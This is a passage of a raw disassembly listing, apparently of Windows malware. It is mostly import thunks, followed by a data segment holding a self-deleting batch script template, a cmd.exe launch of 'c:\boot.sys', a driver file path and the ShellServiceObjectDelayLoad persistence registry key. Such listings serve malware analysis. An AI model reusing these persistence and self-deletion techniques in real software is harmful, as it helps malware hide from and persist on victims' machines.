jmp ds:dword_448404
sub_40CAB8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAC4 proc near ; CODE XREF: sub_402B9B+4B6�p
; sub_408896+65�p
jmp ds:dword_448408
sub_40CAC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAD0 proc near ; CODE XREF: sub_40132A+48�p
; sub_401AF1+2F�p ...
jmp ds:dword_44840C
sub_40CAD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CADC proc near ; CODE XREF: sub_4053A3+45�p
; sub_408165+200�p ...
jmp ds:dword_448410
sub_40CADC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAE8 proc near ; CODE XREF: sub_408477+EC�p
jmp ds:dword_448414
sub_40CAE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAF4 proc near ; CODE XREF: sub_4063C4+33C�p
; sub_4063C4+381�p
jmp ds:dword_448418
sub_40CAF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB00 proc near ; CODE XREF: sub_4063C4+54E�p
; sub_408C17+300�p
jmp ds:dword_44841C
sub_40CB00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB0C proc near ; CODE XREF: sub_40876F+1E�p
jmp ds:dword_448420
sub_40CB0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB18 proc near ; CODE XREF: sub_4087A8+18�p
jmp ds:dword_448424
sub_40CB18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB24 proc near ; CODE XREF: sub_402B9B+4F7�p
jmp ds:dword_448428
sub_40CB24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB30 proc near ; CODE XREF: sub_4069C0+2E�p
jmp ds:dword_44842C
sub_40CB30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB3C proc near ; CODE XREF: sub_403BBF+15F�p
; sub_4041FC+31A�p ...
jmp ds:dword_448430
sub_40CB3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB48 proc near ; CODE XREF: sub_403BBF+AD�p
; sub_403D2D+2AB�p ...
jmp ds:dword_448434
sub_40CB48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB54 proc near ; CODE XREF: sub_40AB84+533�p
jmp ds:dword_448438
sub_40CB54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB60 proc near ; CODE XREF: sub_401C68+7F�p
; sub_4055F7+17�p ...
jmp ds:dword_44843C
sub_40CB60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB6C proc near ; CODE XREF: sub_4069C0+12�p
jmp ds:dword_448440
sub_40CB6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB78 proc near ; CODE XREF: sub_4063C4+29E�p
; sub_408C17+289�p
jmp ds:dword_448444
sub_40CB78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB84 proc near ; CODE XREF: sub_40802E+2B�p
; sub_40AB84+7AB�p
jmp ds:dword_448448
sub_40CB84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB90 proc near ; CODE XREF: sub_40B3C6+140�p
jmp ds:dword_448454
sub_40CB90 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB9C proc near ; CODE XREF: sub_4063C4+3A4�p
; sub_406B58+A9�p ...
jmp ds:dword_448458
sub_40CB9C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBA8 proc near ; CODE XREF: sub_408FEB+AE�p
; sub_40B525+105�p ...
jmp ds:dword_44845C
sub_40CBA8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBB4 proc near ; CODE XREF: sub_4063C4+326�p
jmp ds:dword_448460
sub_40CBB4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBC0 proc near ; CODE XREF: sub_408F56+18�p
; sub_408F56+84�p
jmp ds:dword_448464
sub_40CBC0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBCC proc near ; CODE XREF: sub_408F56+53�p
jmp ds:dword_448468
sub_40CBCC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBD8 proc near ; CODE XREF: sub_408FEB+A9C�p
; sub_40B3C6+66�p ...
jmp ds:dword_44846C
sub_40CBD8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBE4 proc near ; CODE XREF: sub_406EA8+6F�p
jmp ds:dword_448470
sub_40CBE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBF0 proc near ; CODE XREF: sub_40AB84+49F�p
jmp ds:dword_448474
sub_40CBF0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBFC proc near ; CODE XREF: sub_40AB84+7D9�p
jmp ds:dword_448478
sub_40CBFC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC08 proc near ; CODE XREF: sub_40AB84+4B3�p
jmp ds:dword_44847C
sub_40CC08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC14 proc near ; CODE XREF: sub_40B525+3C0�p
; sub_40B525+473�p ...
jmp ds:dword_448480
sub_40CC14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC20 proc near ; CODE XREF: sub_40AB84+832�p
jmp ds:dword_448484
sub_40CC20 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC2C proc near ; CODE XREF: sub_408FEB+9BD�p
; sub_408FEB+9F6�p ...
jmp ds:dword_448488
sub_40CC2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC38 proc near ; CODE XREF: sub_408FEB+9E4�p
; sub_408FEB+A20�p ...
jmp ds:dword_44848C
sub_40CC38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC44 proc near ; CODE XREF: sub_4045BD+6C�p
jmp ds:dword_448490
sub_40CC44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC50 proc near ; CODE XREF: sub_4045BD+8E�p
jmp ds:dword_448494
sub_40CC50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC5C proc near ; CODE XREF: sub_4045BD+36�p
jmp ds:dword_448498
sub_40CC5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC68 proc near ; CODE XREF: sub_40AB84+803�p
jmp ds:dword_44849C
sub_40CC68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC74 proc near ; CODE XREF: sub_40AB84+81E�p
jmp ds:dword_4484A0
sub_40CC74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC80 proc near ; CODE XREF: sub_405098+5E�p
; sub_405098+D2�p ...
jmp ds:dword_4484A4
sub_40CC80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC8C proc near ; CODE XREF: sub_408FEB+25F�p
; sub_408FEB+3C2�p ...
jmp ds:dword_4484A8
sub_40CC8C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC98 proc near ; CODE XREF: sub_40AB84+4F1�p
jmp ds:dword_4484AC
sub_40CC98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCA4 proc near ; CODE XREF: sub_40B525+214�p
jmp ds:dword_4484B0
sub_40CCA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCB0 proc near ; CODE XREF: sub_408FEB+97�p
; sub_40B525+8D9�p
jmp ds:dword_4484B4
sub_40CCB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCBC proc near ; CODE XREF: sub_408FEB+100�p
; sub_408FEB+17F�p ...
jmp ds:dword_4484B8
sub_40CCBC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCC8 proc near ; CODE XREF: sub_40B525+22B�p
; sub_40B525+7E5�p
jmp ds:dword_4484BC
sub_40CCC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCD4 proc near ; CODE XREF: sub_40B525+1C6�p
jmp ds:dword_4484C0
sub_40CCD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCE0 proc near ; CODE XREF: sub_40B525+8EC�p
jmp ds:dword_4484C4
sub_40CCE0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCEC proc near ; CODE XREF: sub_40AB84+4C6�p
jmp ds:dword_4484D0
sub_40CCEC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CCF8 proc near ; CODE XREF: sub_40B525+2D9�p
jmp ds:dword_4484D4
sub_40CCF8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD04 proc near ; CODE XREF: sub_40B525+2B2�p
; sub_40B525+2BE�p
jmp ds:dword_4484D8
sub_40CD04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD10 proc near ; CODE XREF: sub_40B525+310�p
jmp ds:dword_4484DC
sub_40CD10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD1C proc near ; CODE XREF: sub_408FEB+231�p
; sub_408FEB+8C3�p
jmp ds:dword_4484E0
sub_40CD1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD28 proc near ; CODE XREF: sub_405249+41�p
jmp ds:dword_4484EC
sub_40CD28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD34 proc near ; CODE XREF: sub_405249+90�p
jmp ds:dword_4484F0
sub_40CD34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD40 proc near ; CODE XREF: sub_401614+43�p
; sub_4040C4+53�p
jmp ds:dword_4484F4
sub_40CD40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD4C proc near ; CODE XREF: sub_4014CB+8C�p
; sub_401614+96�p ...
jmp ds:dword_4484F8
sub_40CD4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD58 proc near ; CODE XREF: sub_4014CB+39�p
jmp ds:dword_4484FC
sub_40CD58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD64 proc near ; CODE XREF: sub_4014CB+72�p
jmp ds:dword_448500
sub_40CD64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD70 proc near ; CODE XREF: sub_401614+7C�p
; sub_4040C4+84�p
jmp ds:dword_448504
sub_40CD70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD7C proc near ; CODE XREF: sub_402353+153�p
jmp ds:dword_448508
sub_40CD7C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD88 proc near ; CODE XREF: sub_402353+18E�p
jmp ds:dword_44850C
sub_40CD88 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CD94 proc near ; CODE XREF: sub_402353+174�p
jmp ds:dword_448510
sub_40CD94 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDA0 proc near ; CODE XREF: sub_405098+17�p
jmp ds:dword_448514
sub_40CDA0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDAC proc near ; CODE XREF: sub_405098+179�p
jmp ds:dword_448518
sub_40CDAC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDB8 proc near ; CODE XREF: sub_405098+27�p
jmp ds:dword_44851C
sub_40CDB8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDC4 proc near ; CODE XREF: sub_4036F8+40�p
jmp ds:dword_448528
sub_40CDC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDD0 proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44852C
sub_40CDD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDDC proc near ; CODE XREF: sub_406B58+18F�p
; sub_406EA8+6A�p ...
jmp ds:dword_448530
sub_40CDDC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDE8 proc near ; CODE XREF: sub_405415+130�p
; sub_405415+1B0�p
jmp ds:dword_448534
sub_40CDE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CDF4 proc near ; CODE XREF: sub_409A96+FA2�p
; sub_409A96+FBF�p
jmp ds:dword_448538
sub_40CDF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE00 proc near ; CODE XREF: sub_401219+74�p
; sub_409A96+D25�p ...
jmp ds:dword_44853C
sub_40CE00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE0C proc near ; CODE XREF: sub_408896+F7�p
jmp ds:dword_448540
sub_40CE0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE18 proc near ; CODE XREF: sub_40129C+1B�p
; .text:00401453�p ...
jmp ds:dword_448544
sub_40CE18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE24 proc near ; CODE XREF: sub_4063C4+7E�p
; sub_4063C4+1FF�p ...
jmp ds:dword_448548
sub_40CE24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE30 proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44854C
sub_40CE30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE3C proc near ; CODE XREF: sub_401777:loc_40179D�p
; sub_403D2D+3B�p ...
jmp ds:dword_448550
sub_40CE3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE48 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_448554
sub_40CE48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE54 proc near ; CODE XREF: sub_4038DA+36�p
; .text:004039A7�p ...
jmp ds:dword_448558
sub_40CE54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE60 proc near ; CODE XREF: sub_409A96+5A�p
; sub_40AB84+138�p
jmp ds:dword_44855C
sub_40CE60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE6C proc near ; CODE XREF: sub_409A96+A56�p
jmp ds:dword_448560
sub_40CE6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE78 proc near ; CODE XREF: sub_403530+45�p
; sub_4035A5+58�p ...
jmp ds:dword_448564
sub_40CE78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE84 proc near ; CODE XREF: sub_40C858+17�p
jmp ds:dword_448568
sub_40CE84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CE90 proc near ; CODE XREF: sub_4063C4+472�p
jmp ds:dword_44856C
sub_40CE90 endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002E530 ( 189744.)
; Section size in file : 0002E530 ( 189744.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 72656B5Ch ; DATA XREF: sub_4083E6+4B�w
; sub_4083E6+87�r ...
aNel32_dll db 'nel32.dll',0
align 10h
db 0
aSCmd_pif db '%s\cmd.pif',0
db 0
db 2 dup(0), 5Ch
aCmd_exeCStartC db 'cmd.exe /C start c:\boot.sys',0
align 10h
dd 408h dup(0)
dword_40E060 dd 0 ; DATA XREF: sub_408FEB+A32�w
; sub_40B3C6+100�r
dword_40E064 dd 0 ; DATA XREF: sub_401DB9+25�w
; sub_40211D+FE�w ...
align 10h
dword_40E070 dd 40h dup(0) ; DATA XREF: sub_408165+1EC�o
; sub_409A96+6B7�o ...
dword_40E170 dd 0 ; DATA XREF: sub_40366F+57�w
; sub_40366F:loc_4036EE�r
dd 43Bh dup(0)
dword_40F260 dd 0 ; DATA XREF: sub_401DB9+3A�w
; sub_401DB9+20B�w ...
dword_40F264 dd 0 ; DATA XREF: sub_40211D:loc_4021A3�w
; sub_40211D+92�r ...
dword_40F268 dd 0 ; DATA XREF: sub_406EA8+F1A�r
; sub_406EA8+FA0�r ...
byte_40F26C db 0 ; DATA XREF: sub_401DB9+122�w
align 10h
dword_40F270 dd 40h dup(0) ; DATA XREF: sub_40132A+43�o
; sub_40AB84+3A6�o ...
dword_40F370 dd 0 ; DATA XREF: sub_402976+6F�r
; sub_402B9B+DA�w ...
dd 0FFh dup(0)
dword_40F770 dd 0 ; DATA XREF: sub_403845+50�w
; sub_403845+8B�r
dd 447h dup(0)
dword_410890 dd 0 ; DATA XREF: sub_408FEB+77A�w
; sub_408FEB+909�r ...
align 10h
dword_4108A0 dd 0 ; DATA XREF: .text:00401C22�w
; .text:00401C5E�r
dd 41Bh dup(0)
dword_411910 dd 0 ; DATA XREF: sub_402B9B+578�w
dd 0FFh dup(0)
dword_411D10 dd 785C7325h ; DATA XREF: sub_404170+4B�w
; sub_404170+82�r
aSlfdlnt_bat db 'slfdlnt.bat',0
db 0
db 2 dup(0), 25h
aSCmd_pif_0 db 's\cmd.pif',0
align 10h
db 0
aCmd_exe db '\cmd.exe',0
align 4
db 0
aLoop@delSNul@i db ':loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah
db '@if exist %s goto loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah,0
align 4
dd 73250000h, 20432F20h, 7325h, 3D7h dup(0)
dword_412CE0 dd 0 ; DATA XREF: .text:0040260C�w
; .text:00402647�r
dd 447h dup(0)
dword_413E00 dd 0 ; DATA XREF: sub_408FEB+A5B�w
; sub_40B3C6+120�r
dword_413E04 dd 0 ; DATA XREF: sub_408FEB+4B4�w
; sub_408FEB+960�r ...
align 10h
dword_413E10 dd 0 ; DATA XREF: sub_408B8B+4B�w
; sub_408B8B+82�r
dd 3F1h dup(0)
byte_414DD8 db 0 ; DATA XREF: sub_40211D+9A�w
align 10h
byte_414DE0 db 0 ; DATA XREF: sub_401DB9+5A�w
; sub_401DB9+5F�r ...
align 4
dword_414DE4 dd 0 ; DATA XREF: sub_401DB9+4B�w
; sub_401DB9+1B5�w ...
align 10h
dword_414DF0 dd 40h dup(0) ; DATA XREF: sub_409A96+871�o
; sub_409A96+9A0�o ...
dword_414EF0 dd 0 ; DATA XREF: sub_402B9B+AC�w
; sub_402B9B+CE�r ...
dd 0FFh dup(0)
dword_4152F0 dd 0 ; DATA XREF: sub_4080E2+52�w
; sub_4080E2:loc_40815B�r
dd 443h dup(0)
dword_416400 dd 0 ; DATA XREF: .text:004019D5�w
; .text:loc_4019FD�r
dd 463h dup(0)
dword_417590 dd 0 ; DATA XREF: sub_40469F+4F�w
; sub_40470D:loc_404720�r
dd 41Bh dup(0)
dword_418600 dd 0 ; DATA XREF: .text:00402280�w
; .text:004022B9�r
dd 3EFh dup(0)
dword_4195C0 dd 94h ; DATA XREF: sub_40AB84+EF�w
; sub_40AB84+F9�o
dd 5, 1, 0A28h
dword_4195D0 dd 2 ; DATA XREF: sub_409A96+A9A�r
dd 23h dup(0)
dword_419660 dd 0 ; DATA XREF: sub_40531B+57�w
; sub_40531B:loc_405399�r
dd 453h dup(0)
dword_41A7B0 dd 0 ; DATA XREF: .text:0040148B�w
; .text:loc_4014C1�r
dd 400h dup(0)
byte_41B7B4 db 0 ; DATA XREF: sub_40211D+5C�w
; sub_40211D+61�r
align 4
dword_41B7B8 dd 0 ; DATA XREF: sub_401DB9+41�w
; sub_401DB9+DA�r ...
dword_41B7BC dd 0 ; DATA XREF: sub_40B525+26B�r
dword_41B7C0 dd 0 ; DATA XREF: sub_4022C3+61�w
; sub_402353+133�r ...
align 10h
dword_41B7D0 dd 6972645Ch ; DATA XREF: sub_40129C+5A�w
; sub_40129C:loc_401320�r
aVersNdisrd_sys db 'vers\ndisrd.sys',0
align 8
aEnabledsf db 'enabledsf',0
align 4
dd 73250000h, 2E73255Ch, 657865h, 3F6h dup(0)
dword_41C7D8 dd 0 ; DATA XREF: sub_40AB84+525�w
; sub_40AB84+7D3�r ...
align 10h
dword_41C7E0 dd 0 ; DATA XREF: sub_406937+4A�w
; sub_406937:loc_4069B6�r
dd 410h dup(0)
dword_41D824 dd 0 ; DATA XREF: sub_408FEB+184�w
; sub_408FEB+259�r
dword_41D828 dd 0 ; DATA XREF: sub_408FEB+70�w
; sub_408FEB+91�r ...
dword_41D82C dd 0 ; DATA XREF: sub_4022C3+4C�w
; sub_4025A2+D�r
dword_41D830 dd 463Ah ; DATA XREF: sub_4033E1+58�w
; sub_4033E1+9E�r
dd 459h dup(0)
dword_41E998 dd 0 ; DATA XREF: sub_401DB9+2C�w
; sub_401DB9:loc_401E4D�w ...
dword_41E99C dd 0 ; DATA XREF: sub_408FEB+7E3�w
; sub_408FEB+7F6�r ...
dword_41E9A0 dd 0 ; DATA XREF: sub_408FEB+9FB�w
; sub_40B3C6+EB�r
dword_41E9A4 dd 0 ; DATA XREF: sub_408FEB+328�w
; sub_408FEB+41D�r ...
dword_41E9A8 dd 0 ; DATA XREF: sub_4022C3+71�w
; sub_402528+65�r
dword_41E9AC dd 400000h ; DATA XREF: sub_408FEB+C0�r
; sub_408FEB+13D�r ...
dword_41E9B0 dd 40h dup(0) ; DATA XREF: sub_408C17+B9�o
; sub_409A96+D8C�o ...
dword_41EAB0 dd 0 ; DATA XREF: sub_401DB9+33�w
; sub_401DB9+B6�w ...
align 10h
dword_41EAC0 dd 3430257Bh ; DATA XREF: sub_403A55+48�w
; sub_403A55+8E�r
aX04x04x04x04x0 db 'X%04X-%04X-%04X-%04X-%04X%04X%04X}',0
align 4
dd 0
dd 25000000h, 583830h, 2 dup(0)
aSS_dll db '%s\%s.dll',0
align 4
dd 0
dd 4C430000h, 5C444953h, 495C7325h, 6F72506Eh, 72655363h
dd 33726576h, 32h, 0
dd 68540000h, 64616572h, 4D676E69h, 6C65646Fh, 2 dup(0)
dd 61704100h, 656D7472h, 746Eh, 0
db 0
db 2 dup(0), 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayL'
db 'oad',0
align 10h
dd 426h dup(0)
dword_41FC38 dd 0 ; DATA XREF: sub_408FEB+9C2�w
; sub_40B3C6+CA�r
align 10h
dword_41FC40 dd 40h dup(0) ; DATA XREF: sub_409A96+5DF�o
; sub_40AB84+377�o ...
byte_41FD40 db 0 ; DATA XREF: sub_401DB9+169�w
align 4
dword_41FD44 dd 0 ; DATA XREF: sub_408FEB+105�w
; sub_408FEB+145�r ...
align 10h
byte_41FD50 db 0 ; DATA XREF: sub_406EA8+145�o
; sub_406EA8+C83�o ...
byte_41FD51 db 0 ; DATA XREF: sub_406EA8+E4C�r
byte_41FD52 db 0 ; DATA XREF: sub_406EA8+E55�r
byte_41FD53 db 0 ; DATA XREF: sub_406EA8+E5E�r
dd 3FFFh dup(0)
byte_42FD50 db 0 ; DATA XREF: sub_401DB9+257�w
; sub_401DB9+25C�r
align 4
dword_42FD54 dd 0 ; DATA XREF: sub_406EA8+167�w
; .text:0040809B�r ...
align 10h
dword_42FD60 dd 0 ; DATA XREF: .text:00401845�w
; .text:loc_401879�r
dd 409h dup(0)
dword_430D88 dd 0 ; DATA XREF: sub_4022C3+81�w
dword_430D8C dd 0 ; DATA XREF: sub_4022C3+32�w
; sub_402353+2E�r
dword_430D90 dd 0 ; DATA XREF: sub_408FEB+1ED�w
; sub_408FEB+27F�r ...
byte_430D94 db 0 ; DATA XREF: sub_401DB9+2ED�w
; sub_401DB9+2FC�r ...
align 10h
dword_430DA0 dd 0 ; DATA XREF: sub_404525+48�w
; sub_404525+8E�r
dd 45Fh dup(0)
dword_431F20 dd 0 ; DATA XREF: sub_406E1B+53�w
; sub_406E1B+83�r
dd 422h dup(0)
dword_432FAC dd 0 ; DATA XREF: sub_408FEB+53D�w
; sub_408FEB+942�r ...
dword_432FB0 dd 0 ; DATA XREF: sub_408FEB+65E�w
; sub_40B525+27B�r ...
dword_432FB4 dd 0 ; DATA XREF: sub_408FEB+2C2�w
; sub_408FEB+3BC�r ...
align 10h
dword_432FC0 dd 0 ; DATA XREF: .text:0040872C�w
; .text:00408765�r
dd 3EFh dup(0)
aCWindowsSystem db 'C:\WINDOWS\System32',0 ; DATA XREF: sub_403BBF+4F�o
; sub_403D2D+23A�o ...
dd 3Bh dup(0)
byte_434080 db 0 ; DATA XREF: sub_40132A+BC�o
; sub_408165+124�w ...
align 4
dd 3Fh dup(0)
dword_434180 dd 0 ; DATA XREF: .text:00401AAB�w
; .text:00401AE7�r
dd 418h dup(0)
dword_4351E4 dd 0 ; DATA XREF: sub_408FEB+5CF�w
; sub_408FEB+98D�r ...
dword_4351E8 dd 0 ; DATA XREF: sub_408FEB+879�w
; sub_408FEB+99D�r
align 10h
dword_4351F0 dd 0 ; DATA XREF: .text:004015D4�w
; .text:loc_40160A�r
dd 403h dup(0)
dword_436200 dd 0 ; DATA XREF: sub_40500D+4F�w
; sub_40500D:loc_40508E�r
dd 41Bh dup(0)
dword_437270 dd 0 ; DATA XREF: .text:00401D75�w
; .text:00401DAF�r
dd 44Bh dup(0)
